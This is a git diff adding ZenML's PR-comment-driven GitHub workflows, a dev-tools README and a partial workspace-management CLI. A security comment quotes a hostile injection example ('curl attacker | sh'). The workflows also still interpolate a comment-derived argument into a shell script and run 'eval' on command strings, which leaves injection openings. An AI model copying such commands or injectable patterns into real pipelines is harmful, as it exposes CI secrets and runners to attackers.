diff --git a/.github/workflows/pr-dev-assistant.yml b/.github/workflows/pr-dev-assistant.yml new file mode 100644 index 00000000000..dcf03619d2f --- /dev/null +++ b/.github/workflows/pr-dev-assistant.yml @@ -0,0 +1,320 @@ +--- +name: PR Dev Assistant +on: + issue_comment: + types: [created] +env: + ZENML_ANALYTICS_OPT_IN: false + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} +jobs: + process-comment: + runs-on: ubuntu-latest + if: ${{ github.event.issue.pull_request && startsWith(github.event.comment.body, '!') }} + outputs: + command: ${{ steps.extract-command.outputs.command }} + command_arg: ${{ steps.extract-command.outputs.command_arg }} + pr_number: ${{ github.event.issue.number }} + branch_name: ${{ steps.get-pr-branch.outputs.branch_slug }} + original_branch: ${{ steps.get-pr-branch.outputs.branch }} + zenml_version: ${{ steps.get-pr-branch.outputs.zenml_version }} + is_authorized: ${{ steps.check-permissions.outputs.is_authorized }} + steps: + - name: Check user permissions + id: check-permissions + run: | + # Check if user is a repository collaborator or organization member + USER="${{ github.event.comment.user.login }}" + + # Check if the user is a repo collaborator (has write access) + IS_COLLABORATOR=$(gh api repos/${{ github.repository }}/collaborators/$USER --silent || echo "false") + if [[ "$IS_COLLABORATOR" != "false" ]]; then + echo "User $USER is a repository collaborator" + echo "is_authorized=true" >> $GITHUB_OUTPUT + exit 0 + fi + + # Check if user is org member + ORG="${{ github.repository_owner }}" + IS_ORG_MEMBER=$(gh api orgs/$ORG/members/$USER --silent || echo "false") + if [[ "$IS_ORG_MEMBER" != "false" ]]; then + echo "User $USER is an organization member" + echo "is_authorized=true" >> $GITHUB_OUTPUT + exit 0 + fi + + # If we get here, user is not authorized + echo "User $USER is not authorized to trigger this workflow" + echo "is_authorized=false" >> $GITHUB_OUTPUT + - name: Check if comment contains command + id: extract-command + if: 
steps.check-permissions.outputs.is_authorized == 'true'
        env:
          # SECURITY: pass the untrusted PR-comment body through the
          # environment instead of interpolating ${{ github.event.comment.body }}
          # directly into the script, which would allow shell injection
          # (e.g. a comment containing `"; curl attacker | sh`).
          COMMENT: ${{ github.event.comment.body }}
        run: |
          # Extract command and argument from the comment body
          if [[ "$COMMENT" == "!deploy" ]]; then
            echo "command=deploy" >> $GITHUB_OUTPUT
            echo "command_arg=" >> $GITHUB_OUTPUT
          elif [[ "$COMMENT" == "!update" ]]; then
            echo "command=update" >> $GITHUB_OUTPUT
            echo "command_arg=" >> $GITHUB_OUTPUT
          elif [[ "$COMMENT" == "!destroy" ]]; then
            echo "command=destroy" >> $GITHUB_OUTPUT
            echo "command_arg=" >> $GITHUB_OUTPUT
          elif [[ "$COMMENT" == "!status" ]]; then
            echo "command=status" >> $GITHUB_OUTPUT
            echo "command_arg=" >> $GITHUB_OUTPUT
          elif [[ "$COMMENT" == "!run" ]]; then
            # Bare "!run" (no argument) must be matched before the regex below
            echo "command=run" >> $GITHUB_OUTPUT
            echo "command_arg=" >> $GITHUB_OUTPUT
          elif [[ "$COMMENT" =~ ^!run\ (.*)$ ]]; then
            PIPELINE_NAME="${BASH_REMATCH[1]}"
            echo "command=run" >> $GITHUB_OUTPUT
            echo "command_arg=$PIPELINE_NAME" >> $GITHUB_OUTPUT
          else
            echo "command=none" >> $GITHUB_OUTPUT
            echo "command_arg=" >> $GITHUB_OUTPUT
          fi
      - name: Check if user is unauthorized
        if: steps.check-permissions.outputs.is_authorized == 'false'
        run: |
          echo "User ${{ github.event.comment.user.login }} is not authorized to run this workflow"
          exit 1
      - name: Exit if no valid command
        if: steps.extract-command.outputs.command == 'none'
        run: |
          echo "No valid command found in comment"
          exit 1
      - name: Checkout code
        uses: actions/checkout@v4.2.2
      - name: Install dependencies
        run: |
          python -m pip install --upgrade pip
          pip install .
+ - name: Get PR branch and checkout + id: get-pr-branch + run: | + # Get the PR info to extract the head branch + PR_DATA=$(gh pr view ${{ github.event.issue.number }} --json headRefName --jq .headRefName) + echo "branch=$PR_DATA" >> $GITHUB_OUTPUT + + # Checkout the branch + git checkout $PR_DATA || (echo "Failed to checkout branch $PR_DATA" && exit 1) + + # Use the zen-dev info command to get the slugified branch name and ZenML version + echo "Getting branch info and ZenML version using zen-dev info" + INFO_OUTPUT=$(./zen-dev info) + + # Extract slugified name from output + BRANCH_SLUG=$(echo "$INFO_OUTPUT" | grep "Slugified name:" | cut -d ":" -f 2 | tr -d ' ') + echo "Created Docker-compatible tag: $BRANCH_SLUG" + echo "branch_slug=${BRANCH_SLUG}" >> $GITHUB_OUTPUT + + # Extract ZenML version from output + ZENML_VERSION=$(echo "$INFO_OUTPUT" | grep "ZenML version:" | cut -d ":" -f 2 | tr -d ' ') + echo "Version detected: ${ZENML_VERSION}" + echo "zenml_version=${ZENML_VERSION}" >> $GITHUB_OUTPUT + + # Check if version was found + if [[ -z "$ZENML_VERSION" || "$ZENML_VERSION" == *"Could not determine"* ]]; then + echo "ERROR: ZenML version could not be determined" + echo "This is required for deployment. Please ensure you're using a valid branch." 
+ exit 1 + fi + + # Deploy workspace + deploy-workspace: + needs: process-comment + if: needs.process-comment.outputs.command == 'deploy' + runs-on: ubuntu-latest + steps: + - name: Checkout code + uses: actions/checkout@v4.2.2 + with: + ref: ${{ needs.process-comment.outputs.original_branch }} + - name: Build docker images + uses: google-github-actions/setup-gcloud@v0 + with: + service_account_email: ${{ secrets.GCP_CLOUDBUILD_EMAIL }} + service_account_key: ${{ secrets.GCP_CLOUDBUILD_KEY }} + project_id: ${{ secrets.GCP_CLOUDBUILD_PROJECT }} + - name: Submit build job + run: | + gcloud builds submit \ + --quiet \ + --config=pull_request_cloudbuild.yaml \ + --substitutions=_ZENML_BRANCH_NAME=${{ needs.process-comment.outputs.branch_name }} + - name: Set up Python + uses: actions/setup-python@v5.3.0 + with: + python-version: '3.11' + - name: Install dependencies + run: | + python -m pip install --upgrade pip + pip install . + - name: Run zen-dev deploy + env: + CLOUD_STAGING_CLIENT_ID: ${{ secrets.CLOUD_STAGING_CLIENT_ID }} + CLOUD_STAGING_CLIENT_SECRET: ${{ secrets.CLOUD_STAGING_CLIENT_SECRET }} + DEV_ORGANIZATION_ID: ${{ secrets.CLOUD_STAGING_GH_ACTIONS_ORGANIZATION_ID }} + run: | + # Use zen-dev CLI directly without installation + ./zen-dev deploy --workspace ${{ needs.process-comment.outputs.branch_name }} \ + --zenml-version ${{ needs.process-comment.outputs.zenml_version }} \ + --docker-image zenmldocker/zenml-server-dev:${{ needs.process-comment.outputs.branch_name }} + - name: Add result comment + run: | + TENANT_URL="https://staging.cloud.zenml.io/workspaces/${{ needs.process-comment.outputs.branch_name }}/projects" + gh pr comment ${{ needs.process-comment.outputs.pr_number }} --body "✅ Workspace deployed! 
Access it at: $TENANT_URL" + + # Update workspace + update-workspace: + needs: process-comment + if: needs.process-comment.outputs.command == 'update' + runs-on: ubuntu-latest + steps: + - name: Checkout code + uses: actions/checkout@v4.2.2 + with: + ref: ${{ needs.process-comment.outputs.original_branch }} + - name: Build docker images + uses: google-github-actions/setup-gcloud@v0 + with: + service_account_email: ${{ secrets.GCP_CLOUDBUILD_EMAIL }} + service_account_key: ${{ secrets.GCP_CLOUDBUILD_KEY }} + project_id: ${{ secrets.GCP_CLOUDBUILD_PROJECT }} + - name: Submit build job + run: | + gcloud builds submit \ + --quiet \ + --config=pull_request_cloudbuild.yaml \ + --substitutions=_ZENML_BRANCH_NAME=${{ needs.process-comment.outputs.branch_name }} + - name: Set up Python + uses: actions/setup-python@v5.3.0 + with: + python-version: '3.11' + - name: Run zen-dev update + env: + CLOUD_STAGING_CLIENT_ID: ${{ secrets.CLOUD_STAGING_CLIENT_ID }} + CLOUD_STAGING_CLIENT_SECRET: ${{ secrets.CLOUD_STAGING_CLIENT_SECRET }} + run: | + # Use zen-dev CLI directly without installation + ./zen-dev update --workspace ${{ needs.process-comment.outputs.branch_name }} \ + --zenml-version ${{ needs.process-comment.outputs.zenml_version }} \ + --docker-image zenmldocker/zenml-server-dev:${{ needs.process-comment.outputs.branch_name }} + + - name: Add result comment + run: | + TENANT_URL="https://staging.cloud.zenml.io/workspaces/${{ needs.process-comment.outputs.branch_name }}/projects" + gh pr comment ${{ needs.process-comment.outputs.pr_number }} --body "✅ Workspace updated! 
Access it at: $TENANT_URL"

  # Destroy the workspace associated with the PR branch (triggered by "!destroy")
  destroy-workspace:
    needs: process-comment
    if: needs.process-comment.outputs.command == 'destroy'
    runs-on: ubuntu-latest
    steps:
      - name: Checkout code
        uses: actions/checkout@v4.2.2
        with:
          ref: ${{ needs.process-comment.outputs.original_branch }}
      - name: Set up Python
        uses: actions/setup-python@v5.3.0
        with:
          python-version: '3.11'
      # NOTE(review): unlike deploy-workspace, this job never runs
      # "pip install ." before invoking zen-dev — confirm the CLI's
      # dependencies are available without it.
      - name: Run zen-dev destroy
        env:
          CLOUD_STAGING_CLIENT_ID: ${{ secrets.CLOUD_STAGING_CLIENT_ID }}
          CLOUD_STAGING_CLIENT_SECRET: ${{ secrets.CLOUD_STAGING_CLIENT_SECRET }}
        run: |
          # Use zen-dev CLI directly without installation.
          # Fixed path: every other job in this workflow (and the README)
          # invokes "./zen-dev" from the repo root, not "./dev/zen-dev".
          # First get the workspace ID
          WORKSPACE_ID=$(./zen-dev status --workspace ${{ needs.process-comment.outputs.branch_name }} --format json | jq -r .id)
          ./zen-dev destroy --workspace $WORKSPACE_ID --force

      - name: Add result comment
        run: |
          gh pr comment ${{ needs.process-comment.outputs.pr_number }} --body "✅ Workspace destroyed."

  # Generate the pipeline run matrix (triggered by "!run")
  prepare-pipelines:
    needs: process-comment
    if: needs.process-comment.outputs.command == 'run'
    runs-on: ubuntu-latest
    outputs:
      matrix: ${{ steps.matrix.outputs.matrix }}
      zenml_store_url: ${{ steps.auth.outputs.server_url }}
      # NOTE(review): GitHub strips job outputs that contain masked secret
      # values — verify the API key actually survives this hand-off to the
      # run-pipelines job.
      zenml_store_api_key: ${{ steps.auth.outputs.api_key }}
    steps:
      - name: Checkout code
        uses: actions/checkout@v4.2.2
        with:
          ref: ${{ needs.process-comment.outputs.original_branch }}

      - name: Set up Python
        uses: actions/setup-python@v5.3.0
        with:
          python-version: '3.11'

      - name: Connect to the ZenML Workspace
        id: auth
        env:
          CLOUD_STAGING_CLIENT_ID: ${{ secrets.CLOUD_STAGING_CLIENT_ID }}
          CLOUD_STAGING_CLIENT_SECRET: ${{ secrets.CLOUD_STAGING_CLIENT_SECRET }}
        run: |
          echo "Setting up authentication to ZenML Workspace"

          # Install required packages
          pip install requests

          # Use the dev CLI to authenticate and create a service account
          WORKSPACE_NAME="${{ needs.process-comment.outputs.branch_name }}"

          # The
CLI automatically masks secrets and sets outputs + ./zen-dev gh-action-login + + echo "Successfully connected to ZenML workspace" + + - name: Generate matrix + id: matrix + run: | + # Run the config parser to generate the matrix + FILTER="${{ needs.process-comment.outputs.command_arg }}" + echo "Using filter: '$FILTER'" + + # Get JSON matrix directly from the script + MATRIX=$(python dev/dev_pipelines_config_parser.py --input "$FILTER") + + # Check if any configurations were found + if [[ $MATRIX == *"No matching configurations found"* ]]; then + echo "::error::No matching configurations found for filter: $FILTER" + exit 1 + fi + + # Set the matrix output directly - script outputs JSON + echo "matrix=$MATRIX" >> $GITHUB_OUTPUT + + # Count configurations for reporting + CONFIG_COUNT=$(echo "$MATRIX" | python -c "import json, sys; print(len(json.loads(sys.stdin.read())['include']))") + echo "Found $CONFIG_COUNT configurations to run" + + # Run pipelines using matrix strategy + run-pipelines: + needs: [process-comment, prepare-pipelines] + runs-on: ubuntu-latest + strategy: + matrix: ${{ fromJson(needs.prepare-pipelines.outputs.matrix) }} + fail-fast: false + steps: + - name: Run pipeline using reusable workflow + uses: ./.github/workflows/run-dev-pipeline + with: + zenml_store_url: ${{ needs.prepare-pipelines.outputs.zenml_store_url }} + zenml_store_api_key: ${{ needs.prepare-pipelines.outputs.zenml_store_api_key }} + dev_pipeline: ${{ matrix.pipeline_name }} + branch: ${{ needs.process-comment.outputs.original_branch }} + stack: ${{ matrix.stack }} + run_command: ${{ matrix.command || 'python run.py' }} + kwargs: ${{ matrix.params || '' }} + + \ No newline at end of file diff --git a/.github/workflows/run-dev-pipeline.yml b/.github/workflows/run-dev-pipeline.yml new file mode 100644 index 00000000000..8e405fb4973 --- /dev/null +++ b/.github/workflows/run-dev-pipeline.yml @@ -0,0 +1,97 @@ +--- +name: Run Dev Pipeline +on: + workflow_call: + inputs: + zenml_store_url: 
+ description: ZenML server URL + required: true + type: string + zenml_store_api_key: + description: ZenML server API key + required: true + type: string + dev_pipeline: + description: The name of the dev pipeline to run + required: true + type: string + branch: + description: (Optional) Git branch to checkout + required: false + type: string + default: main + stack: + description: (Optional) ZenML stack to use + required: false + type: string + requirements_file: + description: (Optional) requirements file to install + required: false + type: string + run_command: + description: (Optional) Command to run the pipeline (defaults to "python run.py") + required: false + type: string + default: python run.py + kwargs: + description: (Optional) arguments to pass to the run command + required: false + type: string +jobs: + run-pipeline: + runs-on: ubuntu-latest + env: + ZENML_STORE_URL: ${{ inputs.zenml_store_url }} + ZENML_STORE_API_KEY: ${{ inputs.zenml_store_api_key }} + steps: + - name: Set up Python + uses: actions/setup-python@v5.3.0 + with: + python-version: '3.11' + - name: Checkout code + uses: actions/checkout@v4.2.2 + with: + ref: ${{ inputs.branch }} + - name: Setup target virtual environment + run: | + python -m venv ${{ inputs.dev_pipeline }} + source ${{ inputs.dev_pipeline }}/bin/activate + pip install --upgrade pip uv + echo "Target branch virtual environment created at ${{ inputs.dev_pipeline }}" + - name: Install ZenML + run: | + source ${{ inputs.dev_pipeline }}/bin/activate + uv pip install -e . 
+ zenml --version
      - name: Set ZenML stack (if provided)
        if: inputs.stack != ''
        run: |
          # Fixed: the venv is created under ${{ inputs.dev_pipeline }} in the
          # "Setup target virtual environment" step — there is no "venv" dir,
          # so "source venv/bin/activate" would fail.
          source ${{ inputs.dev_pipeline }}/bin/activate
          echo "Setting ZenML stack to: ${{ inputs.stack }}"
          zenml stack set ${{ inputs.stack }}
      - name: Install requirements (if provided)
        if: inputs.requirements_file != ''
        run: |
          source ${{ inputs.dev_pipeline }}/bin/activate
          echo "Installing requirements from: ${{ inputs.requirements_file }}"

          # Split multiple requirements files and install each one
          IFS=',' read -ra REQ_FILES <<< "${{ inputs.requirements_file }}"
          for req_file in "${REQ_FILES[@]}"; do
            echo "Installing from: $req_file"
            pip install -r "$req_file"
          done
      - name: Run pipeline
        # Fixed: a standalone "cd" step does not persist into later steps, so
        # the previous "Change to pipeline directory" step was a no-op.
        # Use working-directory instead.
        working-directory: dev/pipelines/${{ inputs.dev_pipeline }}
        run: |-
          # Fixed: activate the venv where ZenML was installed (absolute path,
          # since the working directory is no longer the repo root).
          source "${GITHUB_WORKSPACE}/${{ inputs.dev_pipeline }}/bin/activate"
          # Prepare the run command
          RUN_CMD="${{ inputs.run_command }}"

          # Add kwargs if provided
          if [[ -n "${{ inputs.kwargs }}" ]]; then
            RUN_CMD="${RUN_CMD} ${{ inputs.kwargs }}"
          fi
          echo "Running command: ${RUN_CMD}"
          eval ${RUN_CMD}
diff --git a/dev/README.md b/dev/README.md
new file mode 100644
index 00000000000..b669189796f
--- /dev/null
+++ b/dev/README.md
@@ -0,0 +1,231 @@
# ZenML Developer Tools

A collection of developer tools for managing ZenML workspaces and running pipelines during development, including a CLI and GitHub workflow integration.

## Authentication

The CLI tool requires authentication to access the ZenML Cloud API.
You have two options: + + ```bash + # Option 1: Using client credentials (for CI/CD) + export CLOUD_STAGING_CLIENT_ID="your-client-id" + export CLOUD_STAGING_CLIENT_SECRET="your-client-secret" + + # Option 2: Using ZenML's authentication (for local development) + # First login with: zenml login --pro-api-url https://staging.cloudapi.zenml.io + # Then use zen-dev commands which will use your existing ZenML auth + ``` + + ## Workspace Management Commands + + ### Build Docker images + + For all the commands below, you can set `--repo` through an environment variable called `DEV_DOCKER_REPO`. + + ```bash + # Build a ZenML image + ./zen-dev build + + # Build a ZenML server image + ./zen-dev build --server + + # Build and push the server image + ./zen-dev build --server --push + + # Build with a custom tag (tag defaults to the slugified branch name) + ./zen-dev build --repo zenmldocker --tag v1.0 + ``` + + ### Deploy a workspace + + For all the commands below, you can set `--organization` through an environment variable called `DEV_ORGANIZATION_ID`.
+ +```bash +# Create a new workspace with the latest ZenML version +./zen-dev deploy --organization 0000000-0000-0000-000000 + +# Create a new workspace with a custom workspace name (workspace defaults to the sluggied branch name) +./zen-dev deploy --workspace custom-name + +# Specify custom Docker image and Helm chart version +./zen-dev deploy --zenml-version 0.81.0 --docker-image zenmldocker/zenml-server:custom-tag --helm-version 0.36.0 +``` + +### Update a workspace + +```bash +# Update the workspace with the default name (slugified branch name) +./zen-dev update --docker-image some/new:image + +# Update an existing workspace with a new ZenML version +./zen-dev update --workspace my-workspace --zenml-version 0.82.0 + +# Update with a custom Docker image +./zen-dev update --workspace my-workspace --zenml-version 0.82.0 --docker-image zenmldocker/zenml-server:custom-tag +``` + +### Get environment information + +```bash +# Display current git branch, slugified name, and ZenML version +./zen-dev info +``` + +### GitHub Actions authentication + +```bash +# For GitHub Actions workflows only +# Outputs values in GitHub Actions output format +./zen-dev gh-action-login +``` + +### Destroy a workspace + +```bash +# Destroy a workspace (with confirmation prompt) +./zen-dev destroy --workspace my-workspace + +# Force destruction without confirmation +./zen-dev destroy --workspace my-workspace --force +``` + +## Dev Pipelines + +The dev pipelines system allows you to run multiple pipelines with different configurations in a ZenML workspace. + +### Pipeline Configuration + +Create or modify the configuration in `dev/dev_pipelines_config.yaml`. 
The configuration format allows you to define pipelines with multiple stack and parameter combinations: + +```yaml +pipeline_name: + # Optional command to run (defaults to "python run.py") + command: "python custom_script.py" + + # Define stacks with optional requirements files + stacks: + default: null # null means no specific requirements + aws: requirements_aws.txt # path to requirements file + gcp: requirements_gcp.txt + + # Define parameter sets + params: + default: # default parameter set + batch_size: 32 + epochs: 10 + small: # alternative parameter set + batch_size: 16 + epochs: 5 + +another_pipeline: + stacks: + default: + params: + config_a: + config_file: "config_a.yaml" + config_b: + config_file: "config_b.yaml" +``` + +Each pipeline can have: +- An optional `command` to execute (defaults to `python run.py`) +- Multiple `stacks` with optional requirements files +- Multiple parameter sets under `params` + +For each pipeline, the system will generate all valid combinations of stack and parameter sets, which can be run individually or as a group. + + +### GitHub PR Comment Commands + +You can trigger pipelines directly from PR comments using the following commands: + +``` +# Run all pipelines with all configurations +!run + +# Run a specific pipeline with all its configurations +!run pipeline_name + +# Run a specific pipeline with a specific stack +!run pipeline_name:aws + +# Run a specific pipeline with a specific stack and parameter set +!run pipeline_name:aws::small +``` + +Other available commands: +``` +# Deploy a workspace for the current PR branch +!deploy + +# Update the workspace for the current PR branch +!update + +# Destroy the workspace for the current PR branch +!destroy + +# Get the status of the workspace for the current PR branch +!status +``` + +### Adding Dev Pipelines + +To add a new dev pipeline: + +1. Create a directory in `dev/pipelines/your_pipeline_name/` +2. 
Add your pipeline code and a file as the entry point (defaults to run.py) +3. Add the pipeline configuration to `dev/dev_pipelines_config.yaml` +4. Commit and push your changes +5. Trigger the pipeline with a PR comment: `!run your_pipeline_name` + +## Workflow Implementation Details + +The system uses several components: + +1. `./zen-dev`: CLI tool for workspace management and authentication +2. `dev/dev_pipelines_config_parser.py`: Generates pipeline configurations +3. `.github/workflows/pr-dev-assistant.yml`: Processes PR comments and triggers pipelines +4. `.github/workflows/run-dev-pipeline.yml`: Reusable workflow for running a pipeline + +When a user comments on a PR with a command like `!run`, the system: +1. Authenticates with the workspace +2. Creates/Reuses a service account for running pipelines +3. Parses the command to determine which pipelines to run +4. Generates a matrix of configurations +5. Runs each configuration as a separate job + +## Examples + +### Complete Development Workflow + +1. **Create a PR with your changes** + +2. **Deploy a workspace for your branch**: + Comment on the PR: + ``` + !deploy + ``` + +3. **Update the workspace after making changes**: + Comment on the PR: + ``` + !update + ``` + +4. **Run all pipelines to verify functionality**: + Comment on the PR: + ``` + !run + ``` + +5. **Run a specific pipeline configuration**: + Comment on the PR: + ``` + !run my_pipeline:aws::small + ``` + +6. **Clean up when done**: + Comment on the PR: + ``` + !destroy + ``` \ No newline at end of file diff --git a/dev/__init__.py b/dev/__init__.py new file mode 100644 index 00000000000..d6f915f2377 --- /dev/null +++ b/dev/__init__.py @@ -0,0 +1,13 @@ +# Copyright (c) ZenML GmbH 2025. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. 
+# You may obtain a copy of the License at: +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express +# or implied. See the License for the specific language governing +# permissions and limitations under the License. \ No newline at end of file diff --git a/dev/cli.py b/dev/cli.py new file mode 100644 index 00000000000..ef66e166b20 --- /dev/null +++ b/dev/cli.py @@ -0,0 +1,1128 @@ +# Copyright (c) ZenML GmbH 2025. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at: +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express +# or implied. See the License for the specific language governing +# permissions and limitations under the License. 
+"""ZenML Dev CLI for managing workspaces and running dev pipelines.""" + +import json +import os +import re +import subprocess +import sys +import time +from typing import Any, Dict, Optional, Tuple +from uuid import UUID +import logging +import click +import requests + +try: + import docker + from docker.errors import APIError, BuildError + DOCKER_AVAILABLE = True +except ImportError: + DOCKER_AVAILABLE = False + BuildError = Exception + APIError = Exception + +from zenml.login.pro.client import AuthorizationException, ZenMLProClient + +# Constants for environment variables +ZENML_API_URL_ENV = "ZENML_STORE_URL" +ZENML_API_KEY_ENV = "ZENML_STORE_API_KEY" +ZENML_CONFIG_FILE = os.path.expanduser("~/.zenml/dev_config.json") + + +BASE_STAGING_URL = "https://staging.cloudapi.zenml.io" + +def _disect_docker_image_parts(docker_image: str) -> Tuple[str, str]: + """Get the image repository and tag from a Docker image. + + Args: + docker_image: The Docker image to disect. + + Returns: + A tuple of (image_repository, image_tag). + """ + docker_image_parts = docker_image.split(":") + if len(docker_image_parts) == 1: + image_repository = docker_image_parts[0] + image_tag = "latest" + else: + image_repository = docker_image_parts[0] + image_tag = docker_image_parts[1] + return image_repository, image_tag + + +def _get_headers(token: str) -> Dict[str, str]: + """Get the headers for the staging API. + + Args: + token: The access token for the staging API. + + Returns: + A dictionary of headers for the staging API. + """ + return {"Authorization": f"Bearer {token}", "accept": "application/json"} + + +def _build_configuration( + zenml_version: Optional[str], + docker_image: Optional[str] = None, + helm_chart_version: Optional[str] = None, +) -> Dict[str, Any]: + """Build the configuration for the workspace. + + Args: + zenml_version: The ZenML version to use for the workspace. + docker_image: The Docker image to use for the workspace. 
+ helm_chart_version: The Helm chart version to use for the workspace. + + Returns: + The configuration dictionary for the workspace. + """ + configuration: Dict[str, Any] = {} + + if zenml_version: + configuration["version"] = zenml_version + + if any([docker_image, helm_chart_version]): + configuration["admin"] = {} + + if docker_image is not None: + image_repository, image_tag = _disect_docker_image_parts(docker_image) + configuration["admin"] = configuration.get("admin", {}) + configuration["admin"]["image_repository"] = image_repository + configuration["admin"]["image_tag"] = image_tag + + if helm_chart_version is not None: + configuration["admin"] = configuration.get("admin", {}) + configuration["admin"]["helm_chart_version"] = helm_chart_version + + return configuration + + +def get_current_git_branch() -> Optional[str]: + """Get the current git branch name. + + Returns: + The current git branch name, or None if it cannot be determined. + """ + try: + result = subprocess.run( + ["git", "rev-parse", "--abbrev-ref", "HEAD"], + stdout=subprocess.PIPE, + stderr=subprocess.PIPE, + text=True, + check=True + ) + branch = result.stdout.strip() + + # Handle detached HEAD state + if branch == "HEAD": + return None + + return branch + except (subprocess.SubprocessError, FileNotFoundError): + return None + + +def slugify_branch_name(branch_name: str) -> str: + """Convert a branch name to a Docker-compatible tag. + + Implements the same slugification logic as the GitHub workflow: + 1. Convert to lowercase + 2. Replace invalid chars with dashes + 3. Remove leading non-alphanumeric chars + 4. Replace multiple consecutive dashes with a single dash + 5. Remove trailing dashes + 6. Limit to 128 chars max + + Args: + branch_name: The branch name to slugify. + + Returns: + A Docker-compatible tag derived from the branch name. 
+ """ + # Convert to lowercase + slug = branch_name.lower() + + # Replace invalid chars with dashes (only allow a-z, 0-9, ., _, -) + slug = re.sub(r"[^a-z0-9_\.\-]", "-", slug) + + # Remove leading non-alphanumeric chars + slug = re.sub(r"^[^a-z0-9]*", "", slug) + + # Replace multiple consecutive dashes with a single dash + slug = re.sub(r"-+", "-", slug) + + # Remove trailing dashes + slug = re.sub(r"-$", "", slug) + + # Limit to 128 chars max + slug = slug[:128] + + # If we end up with an empty string, use "dev" as fallback + if not slug: + slug = "dev" + + return slug + + +def get_zenml_version() -> Optional[str]: + """Get the ZenML version from the VERSION file. + + Returns: + The ZenML version as a string, or None if the VERSION file cannot be found or read. + """ + # Try different possible locations for the VERSION file + version_paths = [ + "src/zenml/VERSION", # When in the zenml repo root + "../src/zenml/VERSION", # When in the dev directory + "../../src/zenml/VERSION", # When in a subdirectory of dev + ] + + for path in version_paths: + if os.path.exists(path): + try: + with open(path, "r") as f: + # Read and remove any whitespace + return f.read().strip() + except (IOError, OSError): + pass + + return None + + +def get_default_workspace_name() -> str: + """Get a default workspace name based on the current git branch. + + Returns: + A slugified version of the current git branch name, or "dev" if the branch + cannot be determined. + """ + branch = get_current_git_branch() + if branch: + return slugify_branch_name(branch) + else: + return "dev" + + +def get_token(client_id: str, client_secret: str) -> str: + """Get an access token for the staging API. + + Args: + client_id: The client ID for authentication with the API. + client_secret: The client secret for authentication with the API. + + Returns: + A valid access token as a string. + + Raises: + RuntimeError: If the API request fails for any reason. 
+ """ + url = f"{BASE_STAGING_URL}/auth/login" + data = { + "grant_type": "", + "client_id": client_id, + "client_secret": client_secret, + } + response = requests.post(url, data=data) + try: + response.raise_for_status() + except requests.exceptions.HTTPError: + raise RuntimeError( + f"Request failed with response content: {response.text}" + ) + + return response.json()["access_token"] + + +def get_workspace(token: str, workspace_name_or_id: str) -> Dict[str, Any]: + """Get a workspace by name or ID. + + Args: + token: The access token for authentication with the API. + workspace_name_or_id: The name or ID of the workspace to retrieve. + + Returns: + The workspace information as a dictionary. + + Raises: + RuntimeError: If the API request fails for any reason. + """ + url = f"{BASE_STAGING_URL}/workspaces/{workspace_name_or_id}" + + response = requests.get(url, headers=_get_headers(token)) + try: + response.raise_for_status() + except requests.exceptions.HTTPError: + raise RuntimeError( + f"Request failed with response content: {response.text}" + ) + + return response.json() + + +def create_workspace( + token: str, + workspace_name: str, + organization_id: str, + configuration: Dict[str, Any], +) -> Dict[str, Any]: + """Create a new ZenML workspace. + + Args: + token: The access token for authentication with the API. + workspace_name: The name for the new workspace. + organization_id: The ID of the organization to create the workspace in. + configuration: The configuration settings for the workspace. + + Returns: + The created workspace information as a dictionary. + + Raises: + RuntimeError: If the API request fails for any reason. 
+ """ + url = f"{BASE_STAGING_URL}/workspaces" + + data = { + "name": workspace_name, + "organization_id": organization_id, + "zenml_service": { + "configuration": configuration, + }, + } + response = requests.post(url, headers=_get_headers(token), json=data) + + try: + response.raise_for_status() + except requests.exceptions.HTTPError: + raise RuntimeError( + f"Request failed with response content: {response.text}" + ) + + return response.json() + + +def update_workspace( + token: str, + workspace_name_or_id: str, + configuration: Dict[str, Any], +) -> None: + """Update an existing ZenML workspace. + + Args: + token: The access token for authentication with the API. + workspace_name_or_id: The name or ID of the workspace to update. + configuration: The new configuration settings for the workspace. + + Raises: + RuntimeError: If the API request fails for any reason. + """ + url = f"{BASE_STAGING_URL}/workspaces/{workspace_name_or_id}" + + data = { + "zenml_service": {"configuration": configuration}, + "desired_state": "available", + } + + response = requests.patch( + url, json=data, headers=_get_headers(token), params={"force": True} + ) + try: + response.raise_for_status() + except requests.exceptions.HTTPError: + raise RuntimeError( + f"Request failed with response content: {response.text}" + ) + + +def destroy_workspace(token: str, workspace_id: UUID) -> None: + """Destroy (delete) a ZenML workspace. + + Args: + token: The access token for authentication with the API. + workspace_id: The UUID of the workspace to destroy. + + Raises: + RuntimeError: If the API request fails for any reason. 
+ """ + url = f"{BASE_STAGING_URL}/workspaces/{workspace_id}" + + response = requests.delete(url, headers=_get_headers(token)) + try: + response.raise_for_status() + except requests.exceptions.HTTPError: + raise RuntimeError( + f"Request failed with response content: {response.text}" + ) + + +def wait_for_availability(token: str, workspace_name_or_id: str, timeout: int = 600) -> None: + """Wait for a workspace to become available. + + Polls the workspace status until it transitions from 'pending' to 'available' + or until the timeout is reached. + + Args: + token: The access token for authentication with the API. + workspace_name_or_id: The name or ID of the workspace to wait for. + timeout: Maximum time to wait in seconds (default: 600). + + Raises: + RuntimeError: If the workspace fails to become available or if the timeout is reached. + """ + sleep_period = 10 + deadline = time.time() + timeout + workspace = get_workspace(token, workspace_name_or_id) + + click.echo("Waiting for workspace to become available...") + + while workspace["status"] == "pending": + click.echo(f"Current status: {workspace['status']}. Waiting...") + + if time.time() > deadline: + raise RuntimeError( + "Timed out! The workspace could be stuck in a `pending` state." + ) + + time.sleep(sleep_period) + workspace = get_workspace(token, workspace_name_or_id) + + if workspace["status"] != "available": + raise RuntimeError(f"Workspace creation failed with status: {workspace['status']}") + + click.echo(f"Workspace is available! Status: {workspace['status']}") + + +def get_auth_token() -> str: + """Get authentication token from environment variables or ZenML Pro Client. + + Checks for authentication credentials in environment variables and + if not found, tries to use the ZenML Pro Client's existing authentication. + + Returns: + A valid authentication token. + + Raises: + ValueError: If required authentication credentials are not found. 
